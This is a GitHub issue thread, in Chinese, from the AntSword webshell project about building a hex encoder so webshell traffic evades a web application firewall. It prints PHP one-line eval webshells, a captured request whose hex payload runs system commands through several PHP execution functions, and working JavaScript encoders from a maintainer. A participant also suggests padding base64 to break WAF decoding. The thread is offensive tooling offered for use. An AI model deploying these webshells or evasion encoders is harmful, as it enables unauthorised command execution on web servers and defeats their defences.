编码器绕过WAF的bug #185

pang0lin · 2019-06-03T07:44:50Z

你好，我在使用蚁剑编码器的过程中，写了一个php hex的编码器

/**
 * php::hex for 编码器
 * <?php  eval(pack("H*",$_POST[pwd])); ?>
 * Create at: 2019/04/10 13:02:54
 */

'use strict';

/*
* @param  {String} pwd   连接密码
* @param  {Array}  data  编码器处理前的 payload 数组
* @return {Array}  data  编码器处理后的 payload 数组
*/
module.exports = (pwd, data) => {
  // ##########    请在下方编写你自己的代码   ###################
  // 以下代码为 PHP Base64 样例

  // 生成一个随机变量名
  let randomID = `_0x${Math.random().toString(16).substr(2)}`;
  // 原有的 payload 在 data['_']中
  // 取出来之后，转为 base64 编码并放入 randomID key 下

  // shell 在接收到 payload 后，先处理 pwd 参数下的内容，
  let pass = ` eval(pack("H*",$_POST["${randomID}"]));`;
  
  data[pwd] = new Buffer(pass).toString('hex');
  data[randomID] = new Buffer(data['_']).toString('hex');
  // ##########    请在上方编写你自己的代码   ###################

  // 删除 _ 原有的payload
  delete data['_'];
  // 返回编码器处理后的 payload 数组
  return data;
}

使用上面的编码器，确实可以把参数进行hex编码，并且绕过了WAF。

但是在执行系统命令的时候，却被WAF拦截了，我抓包看了一下数据包，发现发送的数据包是下面的
0x692baee12c5a1=L2Jpbi9zaA%3D%3D&0x88a4326879dc8=Y2QgIi9vcHQvbGFtcHAvaHRkb2NzL3dlYjE2MDUwNS9VcGxvYWRzL1BpY3R1cmUvMjAxNi0wNS0yNyI7d2hvYW1pO2VjaG8gW1NdO3B3ZDtlY2hvIFtFXQ%3D%3D&_0x649657e994c51=40696e695f7365742822646973706c61795f6572726f7273222c20223022293b407365745f74696d655f6c696d69742830293b66756e6374696f6e206173656e6328246f7574297b72657475726e20246f75743b7d3b66756e6374696f6e2061736f757470757428297b246f75747075743d6f625f6765745f636f6e74656e747328293b6f625f656e645f636c65616e28293b6563686f20223738346265223b6563686f20406173656e6328246f7574707574293b6563686f20226138323966223b7d6f625f737461727428293b7472797b24703d6261736536345f6465636f646528245f504f53545b22307836393262616565313263356131225d293b24733d6261736536345f6465636f646528245f504f53545b22307838386134333236383739646338225d293b24643d6469726e616d6528245f5345525645525b225343524950545f46494c454e414d45225d293b24633d7375627374722824642c302c31293d3d222f223f222d63205c227b24737d5c22223a222f63205c227b24737d5c22223b24723d227b24707d207b24637d223b66756e6374696f6e206665282466297b24643d6578706c6f646528222c222c40696e695f676574282264697361626c655f66756e6374696f6e732229293b696628656d70747928246429297b24643d617272617928293b7d656c73657b24643d61727261795f6d617028277472696d272c61727261795f6d61702827737472746f6c6f776572272c246429293b7d72657475726e2866756e6374696f6e5f65786973747328246629262669735f63616c6c61626c6528246629262621696e5f61727261792824662c246429293b7d3b66756e6374696f6e2072756e636d64282463297b247265743d303b6966286665282773797374656d2729297b4073797374656d2824632c24726574293b7d656c73656966286665282770617373746872752729297b4070617373746872752824632c24726574293b7d656c7365696628666528277368656c6c5f657865632729297b7072696e7428407368656c6c5f6578656328246329293b7d656c736569662866652827657865632729297b40657865632824632c246f2c24726574293b7072696e74286a6f696e28220a222c246f29293b7d656c736569662866652827706f70656e2729297b2466703d40706f70656e2824632c277227293b7768696c6528214066656f662824667029297b7072696e7428406667657473282466702c203230343829293b7d4070636c6f736528246670293b7d656c736569662866652827616e7473797374656d2729297b40616e7473797374656d282463293b7d656c73657b24726574203d203132373b7d72657475726e20247265743b7d3b247265743d4072756e636d642824722e2220323e263122293b7072696e74202824726574213d30293f227265743d7b247265747d223a22223b3b7d636174636828457863657074696f6e202465297b6563686f20224552524f523a2f2f222e24652d3e6765744d65737361676528293b7d3b61736f757470757428293b64696528293b&pwd=206576616c287061636b2822482a222c245f504f53545b225f307836343936353765393934633531225d29293b

后面的编码确实是hex编码的，这个可以绕过WAF，但是前面面的0x692baee12c5a1和0x88a4326879dc8却是base64编码的，这是系统自动生成的。就是这个base64编码的部分被WAF查杀了
请问，怎么才能让我的数据包是全部编码的，而不是部分编码的

The text was updated successfully, but these errors were encountered:

Medicean · 2019-06-03T10:29:54Z

所有要发送的数据都在 data 这个变量里面，你用个 for 循环就OK了：

  let ret = {};
  for (let _ in data) {
    if (_ === '_') { continue };
    ret[_] = Buffer.from(data[_]).toString('hex');
  }
  ret[pwd] = Buffer.from(data['_']).toString('hex');
  return ret;

需要注意的是，payload 里面对这一部分解码的时候是写死的 base64_decode, 所以，如果你全转成自己的编码了，你需要在 shell 那一侧先对 $_POST 里面的数据进行一次转换

Medicean · 2019-06-03T12:26:50Z

给你一个样例，你可以参考一下：

/**
php::hex for 编码器
Create at: 2019/04/10 13:02:54

<?php
foreach($_POST as $k => $v){ $_POST[$k]=pack("H*", $v); }
@eval($_POST['ant']);
?>

*/
'use strict';

module.exports = (pwd, data) => {
  let ret = {};
  for (let _ in data) {
    if (_ === '_') { continue };
    ret[_] = Buffer.from(data[_]).toString('hex');
  }
  ret[pwd] = Buffer.from(data['_']).toString('hex');
  return ret;
}

Refer: AntSwordProject/antSword#185

yzddmr6 · 2019-06-04T03:19:54Z

确实我也遇到过这个问题
现在的waf已经开始解码base64的内容了
我觉得可以在原始payload里面在base64加密后加上随机的几位,使waf解码失败
然后再substr取出来有效编码部分进行解码

yzddmr6 · 2019-06-04T03:38:43Z

可以差不多像这样

yzddmr6 · 2019-06-04T03:48:34Z

但是好像在==后面再加字符就太明显了....
那就在前面加吧

Medicean added the 🙋question label Jun 3, 2019

Medicean added a commit to AntSwordProject/AwesomeEncoder that referenced this issue Jun 3, 2019

(Add:PHP) 添加 hex 编码器

dfcd669

Refer: AntSwordProject/antSword#185

Medicean closed this as completed Jun 4, 2019

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

编码器绕过WAF的bug #185

编码器绕过WAF的bug #185

pang0lin commented Jun 3, 2019 •

edited by Medicean

Medicean commented Jun 3, 2019 •

edited

Medicean commented Jun 3, 2019

yzddmr6 commented Jun 4, 2019

yzddmr6 commented Jun 4, 2019

yzddmr6 commented Jun 4, 2019

编码器绕过WAF的bug #185

编码器绕过WAF的bug #185

Comments

pang0lin commented Jun 3, 2019 • edited by Medicean

Medicean commented Jun 3, 2019 • edited

Medicean commented Jun 3, 2019

yzddmr6 commented Jun 4, 2019

yzddmr6 commented Jun 4, 2019

yzddmr6 commented Jun 4, 2019

pang0lin commented Jun 3, 2019 •

edited by Medicean

Medicean commented Jun 3, 2019 •

edited